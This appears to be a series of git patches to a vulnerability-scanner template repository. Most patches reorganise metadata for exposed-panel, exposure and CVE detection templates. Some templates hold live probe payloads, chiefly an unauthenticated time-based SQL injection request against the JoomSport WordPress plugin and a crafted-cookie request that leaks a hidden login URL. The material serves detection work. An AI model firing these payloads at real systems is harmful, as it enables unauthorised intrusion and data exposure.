verizon-router-panel.yaml --- exposed-panels/verizon-router-panel.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/verizon-router-panel.yaml b/exposed-panels/verizon-router-panel.yaml index f93ce64df7..407e71e008 100644 --- a/exposed-panels/verizon-router-panel.yaml +++ b/exposed-panels/verizon-router-panel.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.title:"Verizon Router" - tags: verizon-router, login + tags: panel,verizon,router requests: - method: GET @@ -20,7 +20,6 @@ requests: part: body words: - 'Verizon Router' - condition: and - type: status status: From 32d22ecf1f0ebc3567cc359c93bc406163313f7d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:16:28 +0530 Subject: [PATCH 1250/1415] Update microfocus-admin-server.yaml --- exposed-panels/microfocus-admin-server.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/exposed-panels/microfocus-admin-server.yaml b/exposed-panels/microfocus-admin-server.yaml index 56d11f7d31..41533f358d 100644 --- a/exposed-panels/microfocus-admin-server.yaml +++ b/exposed-panels/microfocus-admin-server.yaml @@ -4,7 +4,10 @@ info: name: Micro Focus Enterprise Server Administration author: theabhinavgaur severity: medium - tags: Micro Focus DSD + metadata: + verified: true + shodan-query: "Micro Focus DSD" + tags: panel,exposure,microfocus,admin requests: - method: GET @@ -16,7 +19,7 @@ requests: - type: word part: header words: - - Micro Focus DSD + - "Micro Focus DSD" - type: status status: From 65e191663ddaab7f901ce6240f19f2ab584e04a2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:25:43 +0530 Subject: [PATCH 1251/1415] Update CVE-2022-2314.yaml --- cves/2022/CVE-2022-2314.yaml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-2314.yaml b/cves/2022/CVE-2022-2314.yaml index f96dd66a19..2b4dc01c58 100644 --- a/cves/2022/CVE-2022-2314.yaml +++ b/cves/2022/CVE-2022-2314.yaml @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/vr-calendar-sync/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2314 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-2314 - cwe-id: CWE-78 metadata: - verified: "true" - tags: cve,cve2021,rce,wpscan,wordpress,wp-plugin,vr-calendar-sync,unauth + verified: true + tags: cve,cve2021,wordpress,wp-plugin,wp,rce,vr-calendar-sync,unauth requests: - raw: From 882debedec8c47bfc5790f0e91c1abd58e9c5fa8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 12 Dec 2022 22:38:12 +0530 Subject: [PATCH 1252/1415] Update CVE-2022-2314.yaml --- cves/2022/CVE-2022-2314.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-2314.yaml b/cves/2022/CVE-2022-2314.yaml index 2b4dc01c58..fac0172cbb 100644 --- a/cves/2022/CVE-2022-2314.yaml +++ b/cves/2022/CVE-2022-2314.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2022-2314 metadata: verified: true - tags: cve,cve2021,wordpress,wp-plugin,wp,rce,vr-calendar-sync,unauth + tags: cve,cve2022,wordpress,wp-plugin,wp,rce,vr-calendar-sync,unauth requests: - raw: From e5398d06d1b5389cb65061c116178d475e4c5791 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:40:15 +0530 Subject: [PATCH 1253/1415] Update qibocms-file-download.yaml --- vulnerabilities/qibocms-file-download.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/qibocms-file-download.yaml b/vulnerabilities/qibocms-file-download.yaml index b351c71785..0de63372c4 100644 --- a/vulnerabilities/qibocms-file-download.yaml +++ b/vulnerabilities/qibocms-file-download.yaml @@ -1,10 +1,10 @@ id: qibocms-file-download info: - name: qibocms file download- arbitary file download + name: Qibocms - Arbitary File Download author: theabhinavgaur severity: high - tags: qibocms-file-download + tags: qibocms,arbitary,download requests: - method: GET @@ -20,6 +20,11 @@ requests: - "$webdb" condition: and + - type: word + part: header + words: + - "filename=config" + - type: status status: - 200 From 27a5c1b9c1af39cb0b7f0bf64634aab09084d484 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:42:18 +0530 Subject: [PATCH 1254/1415] Update qibocms-file-download.yaml --- vulnerabilities/qibocms-file-download.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/qibocms-file-download.yaml b/vulnerabilities/qibocms-file-download.yaml index 0de63372c4..fb1784fb82 100644 --- a/vulnerabilities/qibocms-file-download.yaml +++ b/vulnerabilities/qibocms-file-download.yaml @@ -17,7 +17,7 @@ requests: part: body words: - " Date: Mon, 12 Dec 2022 22:48:05 +0530 Subject: [PATCH 1256/1415] Update qibocms-file-download.yaml --- vulnerabilities/qibocms-file-download.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/vulnerabilities/qibocms-file-download.yaml b/vulnerabilities/qibocms-file-download.yaml index fb1784fb82..f80730e288 100644 --- a/vulnerabilities/qibocms-file-download.yaml +++ b/vulnerabilities/qibocms-file-download.yaml @@ -4,6 +4,8 @@ info: name: Qibocms - Arbitary File Download author: theabhinavgaur severity: high + metadata: + verified: true tags: qibocms,arbitary,download requests: From 9665bcd5f8e3f1b76cafb5e1da51be324ef512cb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 22:55:49 +0530 Subject: [PATCH 1257/1415] Update CVE-2022-45917.yaml --- cves/2022/CVE-2022-45917.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-45917.yaml b/cves/2022/CVE-2022-45917.yaml index f974a5c486..0904a35b46 100644 --- a/cves/2022/CVE-2022-45917.yaml +++ b/cves/2022/CVE-2022-45917.yaml @@ -9,18 +9,19 @@ info: reference: - https://packetstormsecurity.com/files/170181/ILIAS-eLearning-7.15-Command-Injection-XSS-LFI-Open-Redirect.html metadata: - shodan-query: http.html:"ILIAS" verified: true - tags: cve,2022,open,redirect + shodan-query: http.html:"ILIAS" + tags: cve,cve2022,ilias,redirect requests: - method: GET path: - - "{{BaseURL}}/shib_logout.php?action=logout&return=https://attacker.com" - - "{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://attacker.com" + - "{{BaseURL}}/shib_logout.php?action=logout&return=https://example.com" + - "{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://example.com" + stop-at-first-match: true matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' From bf41cfb450e9d0965eee3d95e815844866c02ff0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 12 Dec 2022 23:03:07 +0530 Subject: [PATCH 1258/1415] Update CVE-2022-45917.yaml --- cves/2022/CVE-2022-45917.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2022/CVE-2022-45917.yaml b/cves/2022/CVE-2022-45917.yaml index 0904a35b46..91179758e9 100644 --- a/cves/2022/CVE-2022-45917.yaml +++ b/cves/2022/CVE-2022-45917.yaml @@ -8,6 +8,9 @@ info: ILIAS before 7.16 has an Open Redirect reference: - https://packetstormsecurity.com/files/170181/ILIAS-eLearning-7.15-Command-Injection-XSS-LFI-Open-Redirect.html + - https://seclists.org/fulldisclosure/2022/Dec/7 + - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-ilias-elearning-platform/ + - https://github.com/advisories/GHSA-hf6q-rx44-fh6j metadata: verified: true shodan-query: http.html:"ILIAS" From 37bc060282521ebe4674ed797796ef9b02135bed Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:06:14 +0530 Subject: [PATCH 1259/1415] Update ilias-panel.yaml --- exposed-panels/ilias-panel.yaml | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/exposed-panels/ilias-panel.yaml b/exposed-panels/ilias-panel.yaml index 561cd1c82d..cb207e09f0 100644 --- a/exposed-panels/ilias-panel.yaml +++ b/exposed-panels/ilias-panel.yaml @@ -1,12 +1,12 @@ id: ilias-panel info: - name: ILIAS - Panel + name: ILIAS Panel author: arafatansari severity: info metadata: - shodan-query: http.html:"ILIAS" verified: true + shodan-query: http.html:"ILIAS" tags: panel,ilias requests: @@ -15,15 +15,14 @@ requests: - "{{BaseURL}}/login.php" - "{{BaseURL}}/ilias/login.php" + stop-at-first-match: true matchers: - - type: status - status: - - 200 - - type: word words: - 'Login to ILIAS' - - 'User Name' - - 'Password' - - 'formlogin' - condition: and + - 'alt="ILIAS' + - 'powered by ILIAS' + + - type: status + status: + - 200 From 150fef56273cf8dcd736b91ba50cd4fabd0b3f5d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:11:10 +0530 Subject: [PATCH 1260/1415] Update planet-estream-panel.yaml --- exposed-panels/planet-estream-panel.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/exposed-panels/planet-estream-panel.yaml b/exposed-panels/planet-estream-panel.yaml index 552e662cbb..a26b66b36c 100644 --- a/exposed-panels/planet-estream-panel.yaml +++ b/exposed-panels/planet-estream-panel.yaml @@ -12,15 +12,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}" + - "{{BaseURL}}/Login.aspx" host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word words: - 'Login - Planet eStream' - - 'Enter Credentials..' + - 'Powered by Planet eStream' + - 'aria-label="Planet eStream Website' condition: or - type: status From 2dd077d3936663f180c8c1fd74fe7484f7bba032 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 12 Dec 2022 23:17:12 +0530 Subject: [PATCH 1261/1415] Update planet-estream-panel.yaml --- exposed-panels/planet-estream-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/planet-estream-panel.yaml b/exposed-panels/planet-estream-panel.yaml index a26b66b36c..77bd110968 100644 --- a/exposed-panels/planet-estream-panel.yaml +++ b/exposed-panels/planet-estream-panel.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"Login - Planet eStream" - tags: panel,planet,eStream + tags: panel,planet,estream requests: - method: GET From ebe422ca3acaa71fdbdac6831ab6f3bdc15b2d0c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:17:18 +0530 Subject: [PATCH 1262/1415] Update database-credentials.yaml --- exposures/files/database-credentials.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/files/database-credentials.yaml b/exposures/files/database-credentials.yaml index 0f9997d204..edf5ec1915 100644 --- a/exposures/files/database-credentials.yaml +++ b/exposures/files/database-credentials.yaml @@ -3,12 +3,12 @@ id: database-credentials info: name: Database Credentials File Exposure author: Hardik-Solanki - severity: high + severity: low + reference: + - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: verified: true github-query: filename:database_credentials.inc - reference: - - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt tags: exposure,database,config,files requests: From 6b2db3e077e86b837362e6389bc7b29dee8b679c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:19:20 +0530 Subject: [PATCH 1263/1415] Update golangci-config.yaml --- exposures/configs/golangci-config.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/configs/golangci-config.yaml b/exposures/configs/golangci-config.yaml index 34c753c49d..40b53b3e99 100644 --- a/exposures/configs/golangci-config.yaml +++ b/exposures/configs/golangci-config.yaml @@ -4,12 +4,12 @@ info: name: GolangCI-Lint Configuration File Exposure author: Hardik-Solanki severity: low - metadata: - verified: true - github-query: filename:golangci.yml reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://golangci-lint.run/usage/configuration/ + metadata: + verified: true + github-query: filename:golangci.yml tags: exposure,golang,devops,cicd requests: From 84ad5b64c3e3c84f29a2f8ded122bff026bcc6b3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:21:38 +0530 Subject: [PATCH 1264/1415] Update kubernetes-etcd-keys.yaml --- exposures/files/kubernetes-etcd-keys.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/files/kubernetes-etcd-keys.yaml b/exposures/files/kubernetes-etcd-keys.yaml index f17d0f8785..10ffe53158 100644 --- a/exposures/files/kubernetes-etcd-keys.yaml +++ b/exposures/files/kubernetes-etcd-keys.yaml @@ -3,12 +3,12 @@ id: kubernetes-etcd-keys info: name: Kubernetes etcd Keys Exposure author: Hardik-Solanki - severity: high + severity: medium + reference: + - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: verified: true github-query: filename:apiserver-etcd-client.key - reference: - - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt tags: files,exposure,kubernetes,k8s requests: From a5920e7df5c45297432ee071cddfdc060b98962f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:23:21 +0530 Subject: [PATCH 1265/1415] Update firebase-debug-log.yaml --- exposures/logs/firebase-debug-log.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/logs/firebase-debug-log.yaml b/exposures/logs/firebase-debug-log.yaml index ca4fdd9ad7..f68c3cb876 100644 --- a/exposures/logs/firebase-debug-log.yaml +++ b/exposures/logs/firebase-debug-log.yaml @@ -4,11 +4,11 @@ info: name: Firebase Debug Log File Exposure author: Hardik-Solanki severity: low + reference: + - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: verified: true github-query: filename:firebase-debug.log - reference: - - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt tags: exposure,firebase,log,debug requests: From cdaeb08c8cec1efbadbcf4992f3e7ed96fac90a3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:25:36 +0530 Subject: [PATCH 1266/1415] Update npm-debug-log.yaml --- exposures/logs/npm-debug-log.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/logs/npm-debug-log.yaml b/exposures/logs/npm-debug-log.yaml index 471a88c46e..24856ffbd5 100644 --- a/exposures/logs/npm-debug-log.yaml +++ b/exposures/logs/npm-debug-log.yaml @@ -4,12 +4,12 @@ info: name: NPM Debug Log Disclosure author: Hardik-Solanki severity: low - metadata: - verified: true - github-query: filename:npm-debug.log reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://docs.npmjs.com/generating-and-locating-npm-debug.log-files + metadata: + verified: true + github-query: filename:npm-debug.log tags: exposure,npm,log,debug requests: From 6ad5d3c262fbb02297a5665bee7b371407094f61 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:47:01 +0530 Subject: [PATCH 1267/1415] Update CVE-2021-25099.yaml --- cves/2021/CVE-2021-25099.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-25099.yaml b/cves/2021/CVE-2021-25099.yaml index 0ca41bb764..8759827774 100644 --- a/cves/2021/CVE-2021-25099.yaml +++ b/cves/2021/CVE-2021-25099.yaml @@ -1,7 +1,7 @@ id: CVE-2021-25099 info: - name: Give < 2.17.3 - Unauthenticated Reflected Cross-Site Scripting + name: Give < 2.17.3 - Cross-Site Scripting author: theamanrawat severity: medium description: | @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/give/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25099 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 cve-id: CVE-2021-25099 - cwe-id: CWE-79 metadata: - verified: "true" - tags: cve,cve2021,xss,wpscan,wordpress,wp-plugin,give,unauth + verified: true + tags: cve,cve2021,wordpress,wp-plugin,wp,xss,give,unauth requests: - raw: @@ -34,4 +31,5 @@ requests: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "")' + - 'contains(body, "give_user_login")' condition: and From d0a5b15c38c9c25b1eae48cb9f5233cefb206f8f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:49:02 +0530 Subject: [PATCH 1268/1415] Update svn-wc-db.yaml --- exposures/files/svn-wc-db.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/exposures/files/svn-wc-db.yaml b/exposures/files/svn-wc-db.yaml index 63268dbaf9..eda792a694 100644 --- a/exposures/files/svn-wc-db.yaml +++ b/exposures/files/svn-wc-db.yaml @@ -4,13 +4,13 @@ info: name: SVN wc.db File Exposure author: Hardik-Solanki severity: medium - metadata: - verified: true - google-query: intitle:"index of" "wc.db" reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/svn_wcdb_scanner.rb - tags: exposure,svn,config + metadata: + verified: true + google-query: intitle:"index of" "wc.db" + tags: exposure,svn,config,files requests: - method: GET From 69cb435a1a0ff07063e60167ef5fbd0cc5b12aa1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 12 Dec 2022 23:50:27 +0530 Subject: [PATCH 1269/1415] Update ilias-panel.yaml --- exposed-panels/ilias-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/ilias-panel.yaml b/exposed-panels/ilias-panel.yaml index cb207e09f0..b199ed62ba 100644 --- a/exposed-panels/ilias-panel.yaml +++ b/exposed-panels/ilias-panel.yaml @@ -22,6 +22,7 @@ requests: - 'Login to ILIAS' - 'alt="ILIAS' - 'powered by ILIAS' + condition: or - type: status status: From 20ede90226f0728bf7ef5cc94865f04ec220e2a6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:51:19 +0530 Subject: [PATCH 1270/1415] Update stestr-config.yaml --- exposures/configs/stestr-config.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/exposures/configs/stestr-config.yaml b/exposures/configs/stestr-config.yaml index 1c96a0dc17..b6ae305ca1 100644 --- a/exposures/configs/stestr-config.yaml +++ b/exposures/configs/stestr-config.yaml @@ -4,13 +4,13 @@ info: name: Stestr Configuration File Exposure author: Hardik-Solanki severity: info - metadata: - verified: true - github-query: filename:stestr.conf reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://stestr.readthedocs.io/en/latest/MANUAL.html - tags: exposure,stestr,config + metadata: + verified: true + github-query: filename:stestr.conf + tags: exposure,stestr,config,files requests: - method: GET From 0f876a83a601fa85bcec20a841c2413c779f9458 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:54:42 +0530 Subject: [PATCH 1271/1415] Update badarg-log.yaml --- exposures/logs/badarg-log.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/exposures/logs/badarg-log.yaml b/exposures/logs/badarg-log.yaml index ce30216ceb..a05ff4e14c 100644 --- a/exposures/logs/badarg-log.yaml +++ b/exposures/logs/badarg-log.yaml @@ -4,13 +4,13 @@ info: name: Badarg Log File Exposure author: Hardik-Solanki severity: low - metadata: - verified: true - github-query: filename:badarg.log reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://www.erlang.org/doc/reference_manual/errors.html - tags: exposure,erlang,log,debug + metadata: + verified: true + github-query: filename:badarg.log + tags: exposure,badarg,log,debug requests: - method: GET @@ -24,6 +24,7 @@ requests: words: - 'Special kernel symbols:' - 'Kernel executable memory footprint:' + - 'badarg' condition: and - type: status From 5631300f52c40a9de03ca1595b1fc13d644ec980 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 13 Dec 2022 00:04:11 +0530 Subject: [PATCH 1272/1415] Update and rename master-admin.yaml to gyra-master-admin.yaml --- exposed-panels/gyra-master-admin.yaml | 25 +++++++++++++++++++++ exposed-panels/master-admin.yaml | 32 --------------------------- 2 files changed, 25 insertions(+), 32 deletions(-) create mode 100644 exposed-panels/gyra-master-admin.yaml delete mode 100644 exposed-panels/master-admin.yaml diff --git a/exposed-panels/gyra-master-admin.yaml b/exposed-panels/gyra-master-admin.yaml new file mode 100644 index 0000000000..5da78947bf --- /dev/null +++ b/exposed-panels/gyra-master-admin.yaml @@ -0,0 +1,25 @@ +id: gyra-master-admin + +info: + name: GYRA Master Admin + author: Hardik-Solanki + severity: info + metadata: + verified: true + shodan-query: title:"Login | GYRA Master Admin" + tags: panel,master,admin + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Login | GYRA Master Admin" + + - type: status + status: + - 200 diff --git a/exposed-panels/master-admin.yaml b/exposed-panels/master-admin.yaml deleted file mode 100644 index 2bf6c5a9bb..0000000000 --- a/exposed-panels/master-admin.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: master-admin - -info: - name: Master Admin - author: Hardik-Solanki - severity: info - metadata: - verified: true - shodan-query: title:"Master Admin" - tags: panel,master,admin - -requests: - - method: GET - path: - - '{{BaseURL}}/#/auth/login' - - '{{BaseURL}}/#/login?redirect=%2F' - - '{{BaseURL}}/wp-signup.php' - - '{{BaseURL}}/login' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Master Admin" - - "login" - - "Master-Admin" - condition: or - - - type: status - status: - - 200 From d1a2210f9ff38b56f7cd6ca18fcb7f97b448cdb5 Mon Sep 17 00:00:00 2001 From: Matt Keeler <19890779+mattkeeler@users.noreply.github.com> Date: Mon, 12 Dec 2022 23:35:36 -0500 Subject: [PATCH 1274/1415] Add additional backup extension --- exposures/backups/zip-backup-files.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index 84220006c8..d5e647afda 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml @@ -23,6 +23,7 @@ requests: - "lz" - "rar" - "tar.gz" + - "tar.bz2" - "xz" - "zip" - "z" From 115b5e280d9d9a3cc7998830c4bc4b4aad42b4b9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 13 Dec 2022 13:48:23 +0530 Subject: [PATCH 1275/1415] filename update --- exposures/configs/{phpinfo.yaml => phpinfo-files.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposures/configs/{phpinfo.yaml => phpinfo-files.yaml} (100%) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo-files.yaml similarity index 100% rename from exposures/configs/phpinfo.yaml rename to exposures/configs/phpinfo-files.yaml From 2dcd340a509f196318fa761809d555b8eb797a27 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Tue, 13 Dec 2022 17:09:39 +0530 Subject: [PATCH 1276/1415] Added template for CVE-2022-1595 --- cves/2022/CVE-2022-1595.yaml | 38 ++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2022/CVE-2022-1595.yaml diff --git a/cves/2022/CVE-2022-1595.yaml b/cves/2022/CVE-2022-1595.yaml new file mode 100644 index 0000000000..896412bb68 --- /dev/null +++ b/cves/2022/CVE-2022-1595.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-1595 + +info: + name: HC Custom WP-Admin URL <= 1.4 - Unauthenticated Secret URL Disclosure + author: theamanrawat + severity: medium + description: | + The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request. + reference: + - https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b + - https://wordpress.org/plugins/hc-custom-wp-admin-url/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1595 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.1 + cve-id: CVE-2022-1595 + cwe-id: CWE-200 + metadata: + verified: "true" + tags: cve,cve2022,wpscan,info-disclosure,wordpress,wp-plugin,hc-custom-wp-admin-url,unauth + +requests: + - raw: + - | + HEAD /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Cookie: valid_login_slug=1 + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "Location: ([a-zA-Z0-9_.\\/-]+)" + + - type: status + status: + - 302 \ No newline at end of file From f6c9291b83d7adb772a3fe8528ba60b3df89a21d Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Tue, 13 Dec 2022 19:52:56 +0530 Subject: [PATCH 1277/1415] Added template for CVE-2022-4050 --- cves/2022/CVE-2022-4050.yaml | 39 ++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2022/CVE-2022-4050.yaml diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml new file mode 100644 index 0000000000..a0ed1b9e47 --- /dev/null +++ b/cves/2022/CVE-2022-4050.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-4050 + +info: + name: JoomSport < 5.2.8 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. + reference: + - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f + - https://wordpress.org/plugins/joomsport-sports-league-results-management/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-4050 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,joomsport-sports-league-results-management,unauth + +requests: + - raw: + - | + @timeout: 10s + POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(3))aaaa);--+-"} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "jscaruselcont jsview2")' + condition: and \ No newline at end of file From 03c2ef23918126b24acb6ff78a6d8b9482e2af07 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 13 Dec 2022 15:36:48 -0500 Subject: [PATCH 1278/1415] Dashboard Content Enhancements (#6358) Dashboard Content Enhancements --- cves/2017/CVE-2017-14186.yaml | 46 +++++++++---------- cves/2017/CVE-2017-8917.yaml | 2 +- cves/2022/CVE-2022-1916.yaml | 6 ++- cves/2022/CVE-2022-1933.yaml | 6 ++- cves/2022/CVE-2022-22242.yaml | 6 ++- cves/2022/CVE-2022-26263.yaml | 9 +++- cves/2022/CVE-2022-28290.yaml | 8 ++-- cves/2022/CVE-2022-33965.yaml | 8 ++-- cves/2022/CVE-2022-3484.yaml | 6 ++- cves/2022/CVE-2022-3506.yaml | 7 ++- cves/2022/CVE-2022-3578.yaml | 6 ++- cves/2022/CVE-2022-40359.yaml | 8 ++-- cves/2022/CVE-2022-40879.yaml | 4 +- cves/2022/CVE-2022-42746.yaml | 11 +++-- cves/2022/CVE-2022-42747.yaml | 8 ++-- cves/2022/CVE-2022-42748.yaml | 8 ++-- cves/2022/CVE-2022-42749.yaml | 8 ++-- cves/2022/CVE-2022-43014.yaml | 6 ++- cves/2022/CVE-2022-43015.yaml | 6 ++- cves/2022/CVE-2022-43016.yaml | 6 ++- cves/2022/CVE-2022-43017.yaml | 6 ++- cves/2022/CVE-2022-43018.yaml | 6 ++- miscellaneous/x-recruiting-header.yaml | 2 +- misconfiguration/mysqld-exporter-metrics.yaml | 9 +++- vulnerabilities/other/aerocms-sqli.yaml | 10 +++- vulnerabilities/other/steve-xss.yaml | 8 +++- vulnerabilities/other/wuzhicms-sqli.yaml | 2 + vulnerabilities/wordpress/wptouch-xss.yaml | 10 +++- 28 files changed, 151 insertions(+), 77 deletions(-) diff --git 